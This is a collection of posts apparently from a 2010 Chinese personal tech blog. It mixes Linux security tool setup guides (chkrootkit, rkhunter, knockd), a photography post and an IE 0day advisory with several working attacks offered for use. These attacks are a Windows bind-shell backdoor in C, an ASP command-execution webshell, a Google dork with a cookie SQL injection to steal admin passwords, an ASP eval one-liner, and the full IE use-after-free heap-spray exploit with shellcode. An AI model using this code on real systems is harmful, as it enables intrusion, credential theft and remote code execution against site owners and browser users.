当我们的主机服务器系统出现错误的时候,就自动给管理员发邮件提醒,这样不是很爽,其实linux早想到了这一点,只需修改以下配置文件就可生效
本文编译环境
centos 5.3
[root@localhost voilet]# vi /etc/aliases
[code]
92 # trap decode to catch security attacks
93 decode: root
94
95 # Person who should get root's mail
96 #root: marc
97 root:voilet119@163.com 按住shift+g跳到文件末尾,加上你的邮箱即可
[/code]
以下为本人测试所发邮件

[code]
################### Logwatch 7.3 (03/24/06) ####################
Processing Initiated: Fri Jan 29 18:08:16 2010
Date Range Processed: yesterday
( 2010-Jan-28 )
Period is day.
Detail Level of Output: 0
Type of Output: unformatted
Logfiles for Host: localhost.localdomain
##################################################################

——————— Selinux Audit Begin ————————

Number of audit daemon stops: 2

———————- Selinux Audit End ————————-

——————— Automount Begin ————————

**Unmatched Entries**
lookup_read_master: lookup(nisplus): couldn't locate nis+ table auto.master: 1 Time(s)

———————- Automount End ————————-
[/code]

本站原创,转载请注明出处

一月 29th, 2010

Posted In: 未分类

rootkit 入侵者经常使用的工具,通常非常的隐秘、令用户不易察觉,通过这类工具,入侵者建立了一条能够常时入侵系统,或者说对系统进行实时控制的途径。chkrootkit 来建立入侵监测系统,来保证对系统是否被安装了 rootkit 进行监测。
文件下载地址
ftp://ftp.pangeia.com.br/pub/seg/pac
ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
本文编译环境:centos 5.3
[code]
[root@localhost voilet]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
–19:15:31– ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
=> `chkrootkit.tar.gz'
正在解析主机 ftp.pangeia.com.br… 200.155.17.114
Connecting to ftp.pangeia.com.br|200.155.17.114|:21… 已连接。
正在以 anonymous 登录 … 登录成功!
==> SYST … 完成。 ==> PWD … 完成。
==> TYPE I … 完成。 ==> CWD /pub/seg/pac … 完成。
==> SIZE chkrootkit.tar.gz … 39421
==> PASV … 完成。 ==> RETR chkrootkit.tar.gz … 完成。
长度:39421 (38K)

100%[===============================================================>] 39,421 21.0K/s in 1.8s

19:15:41 (21.0 KB/s) – `chkrootkit.tar.gz' saved [39421]
[/code]

[code]
[root@localhost voilet]# cd chkrootkit*
[root@localhost chkrootkit-0.49]# make sense
gcc -DHAVE_LASTLOG_H -o chklastlog chklastlog.c
gcc -DHAVE_LASTLOG_H -o chkwtmp chkwtmp.c
chkwtmp.c: In function ‘main’:
chkwtmp.c:95: 警告:隐式声明与内建函数 ‘exit’ 不兼容
gcc -DHAVE_LASTLOG_H -D_FILE_OFFSET_BITS=64 -o ifpromisc ifpromisc.c
gcc -o chkproc chkproc.c
gcc -o chkdirs chkdirs.c
gcc -o check_wtmpx check_wtmpx.c
gcc -static -o strings-static strings.c
gcc -o chkutmp chkutmp.c
[root@localhost chkrootkit-0.49]# cd ..
[root@localhost voilet]# cp -r chkrootkit-* /usr/local/
777/ etc/ lib/ mrtg-2/ share/ src/
BerkeleyDB.4.7/ games/ libexec/ samp/ sinff/ ssl/
bin/ include/ man/ sbin/ snmp/ webserver/
[root@localhost voilet]# cp -r chkrootkit-* /usr/local/chkrootkit
[root@localhost voilet]# rm -rf chkrootkit*
[root@localhost voilet]# cd /usr/local/chkrootkit/
[root@localhost chkrootkit]# ./chkrootkit |grep INFECTED 如未出现INFECTED则表面OK,这里需要等会时间有点点长,可以去喝杯咖啡
[root@localhost ~]# chmod 700 chkrootkit 加个脚本可执行的权限
[root@localhost ~]# mv chkrootkit /etc/cron.daily/ 将脚本移动到每天自动运行的目录中
[root@localhost ~]# mkdir /root/commands/ 建立暂时存放命令备份的目录
[root@localhost ~]# cp `which –skip-alias awk cut echo egrep find head id ls netstat ps strings sed uname` /root/commands/ 备份系统命令到建立好的目录
[root@localhost ~]# /usr/local/chkrootkit/chkrootkit -p /root/commands|grep INFECTED 用备份的命令运行chkrootkit
[/code]

[root@localhost ~]# tar cvf /root/commands.tar /root/commands/ 将命令打包
[code]
tar: 从成员名中删除开头的“/”
/root/commands/
/root/commands/awk
/root/commands/sed
/root/commands/ls
/root/commands/netstat
/root/commands/strings
/root/commands/id
/root/commands/echo
/root/commands/cut
/root/commands/ps
/root/commands/head
/root/commands/egrep
/root/commands/find
/root/commands/uname
[/code]
[code]
[root@localhost ~]# gzip /root/commands.tar 将打包的文件压缩
[root@localhost ~]# ls
anaconda-ks.cfg commands commands.tar.gz Desktop install.log install.log.syslog
[/code]
以上为完整配置命令及回显
转载请注明出处本站原创

一月 28th, 2010

Posted In: 未分类

1kb正向连接零管道后门代码
说明:

测试:
本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell
[code]
*/
#pragma comment(linker, "/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint ")
#pragma comment(linker, "/INCREMENTAL:NO /IGNORE:4078 ")
#pragma comment(linker, "/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR ")
#pragma comment(lib, "ws2_32.lib ")

#include
#include

#define MasterPort 80 //连接端口

void Entrypoint()
{
WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;

PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;

char szCMDPath[255];
//——————-
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//—-初始化数据—-
//获取cmd路径
GetEnvironmentVariable( "COMSPEC ",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa);

//设置本地信息和绑定协议
SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.s_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

//绑定端口
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
listen(CSocket,1);
iAddrSize = sizeof(SockAddrIn);
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
//开始连接远程服务器
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
}
[/code]

一月 28th, 2010

Posted In: 未分类

从今天开始,情感写真栏目停止更新,一切都不会有更新,以后BLOG除了技术文章和杂七杂八的文章以外,其它的一切都不在更新,相册后期也会停止更新,请关注本博的朋友谅解

一月 28th, 2010

Posted In: 未分类

大家都知道,如果sshd端口完全公开对外开放,那将是对系统是一个至命的打击,如果指定一个IP来登录主机,可我们的登录地址发生变化,IP地址变化后,我们将被拒之主机之外,怎么办了,这里konckd已经为我们想到了很好的解决办法
以下为安装配置方法
本文编译环境
centos 5.3
先更新下需要的文件
[root@localhost voilet]# yum install gcc glibc-devel
[root@localhost voilet]# yum groupinstall Development Tools
knock下载地址
http://www.invoca.ch/pub/packages/knock/
[code]
[root@localhost voilet]# wget http://www.invoca.ch/pub/packages/knock/knock-0.5-6.src.rpm
–17:26:11– http://www.invoca.ch/pub/packages/knock/knock-0.5-6.src.rpm
正在解析主机 www.invoca.ch… 157.161.91.33
Connecting to www.invoca.ch|157.161.91.33|:80… 已连接。
已发出 HTTP 请求,正在等待回应… 200 OK
长度:91259 (89K) [application/x-rpm]
Saving to: `knock-0.5-6.src.rpm'
100%[=====================================================================================>] 91,259 29.5K/s in 3.0s
17:26:20 (29.5 KB/s) – `knock-0.5-6.src.rpm' saved [91259/91259]
[/code]
编译为rmp安装文件
rpmbuild –rebuild knock-0.5-4.src.rpm
这时系统提示
-bash: rpmbuild: command not found
系统提示未找到rpmbuild命令,然后去centos官方查看相关资料,看到官方人员回复
Is the rpm-build package installed? You can check this with:
rpm rpm-build -q
If not, you can install this package with:
yum install rpm-build
这时才发现,原来我直接用yum install rpmbuild来安装未找到文件的原因,呵,这里大伙也要记住,是yum install rpm-build嘿
在线安装完yum install rpm-build当然就是编译安装文件了
[root@localhost voilet]# rpmbuild –rebuild knock-0.5-6.src.rpm
系统出现了我们可爱的界面
[code]
Installing knock-0.5-6.src.rpm
Executing(%prep): /bin/sh -e /var/tmp/rpm-tmp.86029
+ umask 022
+ cd /usr/src/redhat/BUILD
+ cd /usr/src/redhat/BUILD
+ rm -rf knock-0.5
+ /bin/gzip -dc /usr/src/redhat/SOURCES/knock-0.5.tar.gz

…………中间省略

+ cd /usr/src/redhat/BUILD
+ rm -rf knock-0.5
+ exit 0
[/code]

如果出现这些就表示编译成功,下面我们就开始安装
[code]
[root@localhost voilet]# rpm -ivh /usr/src/redhat/RPMS/i386/knock-*
Preparing… ########################################### [100%]
1:knock-server ########################################### [ 50%]
2:knock ########################################### [100%]
You have new mail in /var/spool/mail/root
[/code]

查看一下knock的使用方法
[code]
[root@localhost voilet]# man knock

-v, –verbose
Output verbose status messages.

-V, –version
Display the version.

-h, –help
Syntax help.

EXAMPLES
knock myserver.example.com 123:tcp 456:udp 789:tcp
knock -u myserver.example.com 8284 4721 18592 42912

SEE ALSO
knockd is the accompanying port-knock server.

AUTHOR
Judd Vinet <jvinet@zeroflux.org>

knockd 0.5 June 26, 2005 knock(1)

**********************详细请自己使用man命令查看,这里省略
[/code]

配置knock配置文件
[code]
[root@localhost voilet]# vi /etc/knockd.conf
[options]
UseSyslog

[opencloseSSH]
sequence = 2222:udp,3333:tcp,4444:udp
seq_timeout = 15
tcpflags = syn,ack
start_command = /sbin/iptables -A INPUT -s %IP% -p tcp –dport ssh -j ACCEPT
cmd_timeout = 10
stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp –dport ssh -j ACCEPT
[/code]
# 详细使用方法可以用 man knockd 查到,简单说明下:
# [options]: 与 knockd 环境有关的选项;
# UseSyslog: 与 knockd 有关的登录的记录 syslogd 存放到 /var/log/messages
# [opencloseSSH] 开启和关闭 SSH 防火墙的设定;
# sequence: knockd 检测包过滤协议 (tcp/udp)
# seq_timeout: 需要在几秒內,连续触发以上端口;
# tcpflags: 来源数据包标识分析,一般來說, UDP 封包不会有 ack ,
# 所以上述的的数据包是无法符合我们的要求的。
# start_command: 若连续触发所有端口,则 knockd 开始执行这条命令;
# stop_command: 若用户断开了,可是登录超时,则执行这条命令
# cmd_timeout: 若设置 stop_command ,则需要设置防火墙开始与关闭的时间。

启动knockd
[code]
[root@localhost voilet]# /etc/init.d/knockd start
启动 knockd: [确定]
[root@localhost voilet]# knock -v 100.100.100.3 2222:udp 3333:tcp 4444:udp
hitting udp 100.100.100.3:2222
hitting tcp 100.100.100.3:3333
hitting udp 100.100.100.3:4444
[/code]
之后就可用putty登录主机了
如果是windows客户端,则需要下载windows客户端的程序进行连接
http://www.zeroflux.org/proj/knock/files/knock-win32.zip
DOS下面启动replease下面的文件即可,然后执行
[code]
knock.exe -v 100.100.100.3 2222:udp 3333:tcp 4444:udp
hitting udp 100.100.100.3:2222
hitting tcp 100.100.100.3:3333
hitting udp 100.100.100.3:4444
[/code]

本站源创,转载请注明出处

一月 27th, 2010

Posted In: 未分类

本文编译环境
centos 5.3

[code]
[root@localhost voilet]# wget http://cdnetworks-kr-2.dl.sourceforge.net/project/rkhunter/rkhunter/1.3.6/rkhunter-1.3.6.tar.gz
[/code]
解压
[code]
[root@localhost voilet]# tar -zxvf rkhunter-1.3.6
[/code]
进入rkhunter目录
[code]
[root@localhost voilet]# cd rkhunter-1.3.6
[/code]
安装
[code][root@localhost rkhunter-1.3.6]# ./installer.sh –install
[/code]
运行rkhunter
[code]
[root@localhost rkhunter-1.3.6]# /usr/local/bin/rkhunter –help[/code]
# 列几个比较常用的参数
[code]
–checkall (-c) :全系统检测,rkhunter 的所有检测項目
–createlogfile :建立日志,一般存放在 /var/log/rkhunter.log
–cronjob :可以使用 crontab 來执行,不会有颜色显示
–report-warnings-only :列出警告信息,正常信息不列出!
–skip-application-check :忽略套件版本检测(如果您已确定系统的套件已patch)
–skip-keypress :忽略按键后继续运行
–quiet :显示提示信息,比 –report-warnings-only 要少
–versioncheck :检测是否有新的版本
[/code]
#更多请参考以下信息
[code]
Usage: rkhunter {–check | –unlock | –update | –versioncheck |
–propupd [{filename | directory | package name},…] |
–list [{tests | {lang | languages} | rootkits}] |
–version | –help} [options]

Current options are:
–append-log Append to the logfile, do not overwrite
–bindir <directory>… Use the specified command directories
-c, –check Check the local system
–cs2, –color-set2 Use the second color set for output
–configfile <file> Use the specified configuration file
–cronjob Run as a cron job
(implies -c, –sk and –nocolors options)
–dbdir <directory> Use the specified database directory
–debug Debug mode
(Do not use unless asked to do so)
–disable <test>[,<test>…] Disable specific tests
(Default is to disable no tests)
–display-logfile Display the logfile at the end
–enable <test>[,<test>…] Enable specific tests
(Default is to enable all tests)
–hash {MD5 | SHA1 | SHA224 | SHA256 | SHA384 | SHA512 |
NONE | <command>} Use the specified file hash function
(Default is SHA1, then MD5)
-h, –help Display this help menu, then exit
–lang, –language <language> Specify the language to use
(Default is English)
–list [tests | languages | List the available test names, languages,
rootkits] or checked for rootkits, then exit
-l, –logfile [file] Write to a logfile
(Default is /var/log/rkhunter.log)
–noappend-log Do not append to the logfile, overwrite it
–nocolors Use black and white output
–nolog Do not write to a logfile
–nomow, –no-mail-on-warning Do not send a message if warnings occur
–ns, –nosummary Do not show the summary of check results
–novl, –no-verbose-logging No verbose logging
–pkgmgr {RPM | DPKG | BSD | Use the specified package manager to obtain or
NONE} verify file hash values. (Default is NONE)
–propupd [file | directory | Update the entire file properties database,
package]… or just for the specified entries
-q, –quiet Quiet mode (no output at all)
–rwo, –report-warnings-only Show only warning messages
-r, –rootdir <directory> Use the specified root directory
–sk, –skip-keypress Don't wait for a keypress after each test
–summary Show the summary of system check results
(This is the default)
–syslog [facility.priority] Log the check start and finish times to syslog
(Default level is authpriv.notice)
–tmpdir <directory> Use the specified temporary directory
–unlock Unlock (remove) the lock file
–update Check for updates to database files
–vl, –verbose-logging Use verbose logging (on by default)
-V, –version Display the version number, then exit
–versioncheck Check for latest version of program
-x, –autox Automatically detect if X is in use
-X, –no-autox Do not automatically detect if X is in use

[/code]
检测执行示例
[code]
[root@localhost rkhunter-1.3.6]# /usr/local/bin/rkhunter –checkall
[ Rootkit Hunter version 1.3.6 ]

Checking system commands…

Performing 'strings' command checks
Checking 'strings' command [ OK ]

Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preloaded libraries [ None found ]
Checking LD_LIBRARY_PATH variable [ Not found ]

Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
[/code]

本站源创,转载请注明出处————————————————————苦咖啡BLOG

一月 26th, 2010

Posted In: 未分类

可能很多人手上有很多的webshell,可都是因为提权的时候不是因为权限低就是因为wscript.shell被禁用无法执行CMD,现在可以用以下代码
把下面代码复制:
[code]<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
%>
[/code]
保存为一个asp文件,然后传到网站目录上去,试着再上传个cmd.exe然后把路径写入上面代码。
然后可以运行过cacls之类的命令。
如果权限限制了某些特殊代码执行,则上面代码无效

本文只供技术交流,请误非法使用,后果自负

一月 21st, 2010

Posted In: 未分类

IE Dom 0day 已被大牛编写网马生成器,感觉非常不错,IE6 7 8一个都没跑掉,先晒下图

以下为下载地址
点击下载此文件

一月 20th, 2010

Posted In: 未分类

在google搜索输入
[code]
inurl:Shownews.asp?相关评论 发表评论: 呢称:评论
[/code]

找到一个你想入侵的站后
把IE地址的东西清空,输入以下代码
[code]
javascri&#112;t:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))[/code]

然后清空IE地址访问记录
以前为
[code]
http://www.xxx.com/shownews.asp?id=95
[/code]

现在为
[code]
http://www.xxx.com/shownews.asp
[/code]

就是把?id后面的删除掉

就会看到这个界面

就会看到这些可爱的东西,相信看到这大家就知道怎么办了吧
MD5解密,然后进后台----上传木马拿webshell然后在提权,这台服务器就是你的了

这是一个cookies注入.操作也很简单,技术交流,请误非法使用</textarea></div></div><script language="javascript" type="text/javascript">initUBB("Message")</script></td>
</tr>
<tr>
<td align="right" valign="top">&nbsp;</td>
<td align="left">

<label for="label4">
<label for="label4"><input id="label4" name="log_disImg" type="checkbox" value="1" />
禁止显示图片</label>
<label for="label5">
<input name="log_DisSM" type="checkbox" id="label5" value="1" />
禁止表情转换</label>
<label for="label6">
<input name="log_DisURL" type="checkbox" id="label6" value="1" />
禁止自动转换链接</label>
<label for="label7">
<input name="log_DisKey" type="checkbox" id="label7" value="1" />
禁止自动转换关键字</label>
</td></tr>

<tr>
<td align="right" valign="top"><span style="font-weight: bold">内容摘要:</span></td>
<td align="left"><div><label for="shC"><input id="shC" name="log_IntroC" type="checkbox" value="1" onClick="document.getElementById('Div_Intro').style.display=(this.checked)?'block':'none'" />编辑内容摘要</label></div>
<div id="Div_Intro" style="display:none">

<textarea name="log_Intro" class="editTextarea" style="width:99%;height:120px;">在google搜索输入
[code]
inurl:Shownews.asp?相关评论 发表评论: 呢称:评论
[/code]
[code]
"%><%eval request("#")%><…[/code]

一月 19th, 2010

Posted In: 未分类

看到很多的摄影发烧友,只是和大家分享了自己的照片,而没有给大家分享经验,今天闲下之即,就写点摄影的经验

很多的朋友可能拿的是DC,也有一些拿的是单反,而在正常的自然光下拍的照片非常好,当天气环境发生变化,就会发现快门速度及照片的效果就不是很好,问题在那了

第一

当出现快门不够快的时候,就要看一下现在的光线是否强,如果不够强请调下你的ISO感光度,越高快门速度越快,当然也有他的弊端,那是什么了,这也就意味着图片的噪点越多,所以并不是什么都是最高的就好,根据你的需求来调节,天色有些暗用400左右,如果太黑就用800-1600,不过这样的照片就要后期降噪处下

第二

色温,这时可能会有朋友问,什么是色温,那就是环境,比如你在家,光线是灯光发出的,而你拍照片的时候感觉不够亮,又打了闪光,这个时候你发现,奇怪怎么色调变了,或是你不打闪光,拍的照片却发红,可现在没红光?一连串的问题,你都在思考,这就是因为色温不对的原因,每种环境都有他的色温,比如你在景区拍照片,而这个地方就是灯光特别漂亮,如果你打了强光的闪光灯,你只看清了实物,而看不清灯光的色了,这时你会很遗憾,请动下你宝贵的手,调节一下色温到现在的灯光状态,然后在拍摄,是否就发现正常了,达到你想要的效果了,所以请在不同的环境调节不同的色温

第三

光圈,这个时候很多朋友肯定知道光圈这东西,但是如何来合理使用,这个并不难,这样来理解,大光圈进光量多,快门速度快,虚化的背景漂亮,多用与人物特写,小光圈进光量少,快门速度慢,拍摄时间长,适合夜间拍摄风景照片,一定要用三角架,如果你感觉你能拿着相机一分钟站在那不会动的话,可以不用,这样就意味着照片特别清楚,没有虚化的背景效果,色彩饱满,这样你就知道在什么时候使用什么样的光圈大小,根据你想要的效果来调节

第四

M档手动调节爆光参数,这个档是大师级用的,现在的单反这个档是非常好的,根据取影器的参数你随时知道现在的照片是正常的,还是偏黑还是偏亮,很容易就知道可随时调节你想要的效果,新手不推荐使用M档,推荐使用AV档

第五

AV档,是什么意思了,AV档就是光圈优先,这个档也是新手最常用的档,非常好用,如果你用的是单反,在这个档上面只要选择焦距和色温感光度就好了,这样大家明白为什么新手多用AV档了吧,当你用AV档练习的差不多的时候,在切换到M档来拍照片,慢慢你也是一大师级的人物

今天就写这么多,上班了,要赶工作……ing

一月 19th, 2010

Posted In: 未分类

此0day漏洞存在于IE浏览器,且可导致远程代码执行
研究发现Windows 2000 SP4上(以下省去Windows)的IE 5.1 SP4不受此影响;而以下IE版本(无论是32位还是64位)均受此漏洞影响:
2000 SP4上的 IE6 SP1
XP、Server 2003、Vista、Server 2008、7、Server 2008 R2上的IE6、IE7、IE8

此漏洞存在于IE无效的指针引用。当对象被删除后,在一定的条件下可以访问无效的指针。在针对此漏洞的攻击里试图访问一个已释放的对象时,可引起IE执行远程代码。
当前,微软已知的利用此漏动的攻击影响有限且有针对性,仅针对IE6。微软并未发现利用此漏洞针对其他版本IE的攻击。微软会继续监视漏洞带来的影响并更新安全通报979352。
另外,已发现的利用此漏洞的攻击可以被DEP(Data Execution Prevention,数据执行保护)阻挠。DEP在IE8中是默认启用的;而在IE7中,用户可手动开启DEP。

手动开启IE7中DEP保护的办法:
1.打开“Internet属性”(从控制面板打开;或打开IE,选择“工具”,再选择“Internet属性”),切换到“高级”选项卡。
2.选中“启用内存保护帮助减少联机攻击”,重启IE7后生效。

或者你也可以使用微软提供的Fix It工具来针对IE6、IE7启用DEP保护
Fix It微软官方下载地址(单击):http://go.microsoft.com/?linkid=9668626
下载后,按照此工具的向导操作即可。
卸载工具下载地址(单击):http://go.microsoft.com/?linkid=9668627

一月 19th, 2010

Posted In: 未分类

以下为攻击代码,只供技术交流,一切后果与本人无关

[code]
<html>
<head>
<script>

var var_comment = "COMMENT";

var var_x1 = new Array();
for (i = 0; i < 200; i ++ ){
var_x1 = document.createElement(var_comment);
var_x1.data = "var_abc";
};

var var_e1 = null;

var var_memory = new Array();

function var_boom() {

var var_shellcode = unescape('%u4b27%u9bd6%u96d6%ufd98%u9343%u924f%u93d6%uf94e%u4892%u4293%ud6f9%u4f4e%uf892%uf8d6%ufd9b%u9791%u2ffc%u374e%u9392%u469f%u4f49%u4b3f%u9b4a%u2f93%u3f4a%u914f%ufd37%u9f92%u4e46%uf991%u9197%u9f98%u464f%u9642%u4248%u27fc%u4627%u9946%uf993%ufd48%u4ff9%u9bf9%ud693%u97fc%u4291%u9737%u4149%u4092%u9f4e%u969b%u994a%u41fc%u4e37%u9043%u9048%u9f4f%u9f9b%u4342%ud64b%u4740%u9bfc%u4a48%u3f3f%u41f5%ufd41%u974e%u4b98%u3ffc%u2796%u2727%u9227%u4347%u414a%ud6f9%u994f%u414a%u9890%u9092%u3ff9%u4ef5%u9b96%uf543%u4398%u4b9b%u404a%ufc96%u4993%u9649%u4296%u924a%u4f98%ufd3f%u40f5%uf990%u4f96%u4bfc%u3f40%u9093%u9f4b%u374a%u90d6%ud6fc%u4b93%u9847%u4148%u3f93%u9997%uf999%u90fd%ufcf8%uf849%u4249%u9046%u4997%uf548%u3f98%ud649%u4a97%u9b37%u40f5%u92fc%u9348%u3740%u9b97%u4e41%u9743%u9099%u3742%u9090%u4697%u9242%u4e46%u9ffc%u40fc%u9798%u9149%u993f%u4342%u464e%u4742%u9027%u4896%u4b27%u4096%uf94b%u9f4e%u9627%u3ff5%uf541%u49fc%uf547%u48d6%u4242%u4642%uf9fd%u994f%ufdd6%u3f43%u422f%u4142%ufc9b%u9327%u4a43%u2749%u4af8%u4b93%ud637%u92fd%u4e9f%u4b97%uf59f%u472f%u4b92%u4a48%uf927%u993f%u404f%u98fc%u3741%u99fd%u4b42%uf543%u4ff9%u9f99%ufd9f%u984e%u9792%u2f3f%u4742%u9337%u9b9b%u4648%u4341%u4af9%u9f4e%u9890%u93fd%u3f47%u4896%ud643%u9698%uf89b%ud62f%u494f%u4f9f%u2798%u2f4e%u914a%u48f5%u4b37%u4a4e%u2ff9%u9148%u9837%u2727%u9092%u4af9%u49fd%u414f%u4e48%u3796%u4147%u2f47%u47d6%ufdd6%u2f9b%u4396%u4940%u9637%u9f90%u4240%u3746%u904b%u93f5%u2747%u4fd6%u4891%u4a9b%u4693%u9341%u4b40%u9637%u9190%u4947%u4bf5%u92fc%u47f9%u2f40%u2ffd%ufd40%u40f9%u372f%u372f%u4ff5%u2f99%u2f92%u4243%uf5f9%u4048%u9f9b%u97fc%u279f%u964e%u9f4a%ufcf9%uf596%u91d6%u99f8%uf949%uf543%u4b48%u932f%u9640%uf948%u2f2f%ufc2f%ufd43%u4993%u92fc%u3ff5%uf94a%u96f9%u9642%uf54b%u9f96%u4e4b%u4e40%u9f4f%uf998%u4b49%u999b%ufc37%ufd2f%u90d6%u4f48%u4afc%u4796%ufc3f%u3f46%u9798%u4148%u9f3f%u49f5%u4a37%ufd2f%u404b%u9b9b%u9848%u9143%u43f5%ufdf8%u493f%u48f8%u4148%u9099%u97fc%ud627%uf546%u4642%u41fd%u9b40%u93f5%u9847%u4241%u9092%u3793%u4a96%u9992%ud690%uf946%u4342%u469f%u4efc%uf991%u933f%u92f5%u9796%u4093%u93fc%u484a%u474e%u2f92%u4848%u4390%u4e43%u4a27%u409f%u939b%ufd99%u4ff5%ufd37%u4391%uf8f8%u9f27%u974f%u3f93%uf53f%u4091%u4627%u4f96%u3f96%u4b98%u9892%u4090%u4142%u9341%u9147%u999b%u4f41%u27d6%u98f9%u4392%u4746%u9640%u3797%u4b90%u914a%u924f%u999f%u9fd6%u3741%u412f%ueebf%uf983%u2ba1%ud9c9%ud9f7%u2474%u5ef4%u35b1%u7e31%u8311%ufcee%u7e03%u61e3%u200c%u313f%udc1d%u4640%uaa09%ub7be%ucdca%u5237%udffb%u1623%uefae%u7a20%u9b43%u6f64%ue9d0%u80a0%u4751%uaf96%u6962%u6316%ueba0%u7eea%ucbf5%ub0d3%u0d08%uac14%u5fe3%ubacd%u7056%ufe7a%u716a%u74ac%u09d2%u4bc9%ua3a7%u9bd0%ubf18%u039a%ue712%u353a%ufbf7%u7c06%ucf7c%u7ffd%u0154%ub1fe%uce98%u7dc1%u0e15%ub906%u65c6%ub97c%u7e7b%uc347%u0ba7%u6355%uab23%u95bd%u2ae0%u9936%u384d%ube10%ued50%uba2b%u10d9%u4afb%u3699%u17df%u5679%uf246%u672c%u5a98%ucd90%u49d3%u74c5%u07be%uf418%u61c5%u061a%uc1c5%u3773%u8e4e%uc804%uea85%u82fb%u5b87%u4a94%ude52%u6cf9%u1d89%uef04%ude3b%ueff3%udb4e%ub7b8%u91a3%u5dd1%u06c3%u77d1%uc7ad%u1d59%u7941%uf3c6%u01c4%u0c63');

var var_spray = unescape( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

do { var_spray += var_spray } while( var_spray.length < 0xd0000 );

for(var_i = 0; var_i < 150; var_i++) var_memory[var_i] = var_spray + var_shellcode;
}

function var_ev1(evt){
var_boom();
var_e1 = document.createEventObject(evt);
document.getElementById("var_sp1").innerHTML = "";
window.setInterval(var_ev2, 50);
}

function var_ev2(){
p ="u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d";
for (i = 0; i < var_x1.length; i ++ ){
var_x1.data = p;
}

var t = var_e1.srcElement;
}
</script>
</head>
<body>

<span id="var_sp1"><img src="/a4tpCOZ3Tvar_start.gif"onload="var_ev1(event)"></span></body></html>

</body>
</html>
[/code]

一月 19th, 2010

Posted In: 未分类

今天在windows 7下面安装一个chm的电子书制作软件,却因软件破坏了我所有的快捷方式,包括开始菜单的所有安装程序都无法正常打开
网上搜了很多方法,才解决问题,现在分享一样解决方案
[code]HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts.lnkOpenWithList
[/code]
在注册表找到这个地方
除默认以外其它全部删掉
[code]HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts.lnkOpenWithProgids
[/code]这个键值下面的默认和lnkfile以外,其它的全部删掉
结束进程的explorer,然后在重新启动explorer
这个时候看下桌面上的任何连接是否都恢复了正常图标,是否可以打开了,个人经验,现分享给大家

一月 13th, 2010

Posted In: 未分类

在centos下面配置snort需要以下文件
[code]
wget http://sysoev.ru/nginx/nginx-0.8.15.tar.gz
wget http://www.php.net/get/php-5.2.10.tar.gz/from/this/mirror
wget http://q.kukafie520.net/soft/linux/nginx_php/phpfpm/php-5.2.10-fpm-0.5.11.diff.gz
wget http://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.38.tar.gz/from/http://mysql.he.net/
wget http://ftp.gnu.org/pub/gnu/libiconv/libiconv-1.13.tar.gz
wget "http://downloads.sourceforge.net/mcrypt/libmcrypt-2.5.8.tar.gz?modtime=1171868460&big_mirror=0"
wget "http://downloads.sourceforge.net/mcrypt/mcrypt-2.6.8.tar.gz?modtime=1194463373&big_mirror=0"
wget http://pecl.php.net/get/memcache-2.2.5.tgz
wget "http://downloads.sourceforge.net/mhash/mhash-0.9.9.9.tar.gz?modtime=1175740843&big_mirror=0"
wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-7.9.tar.gz
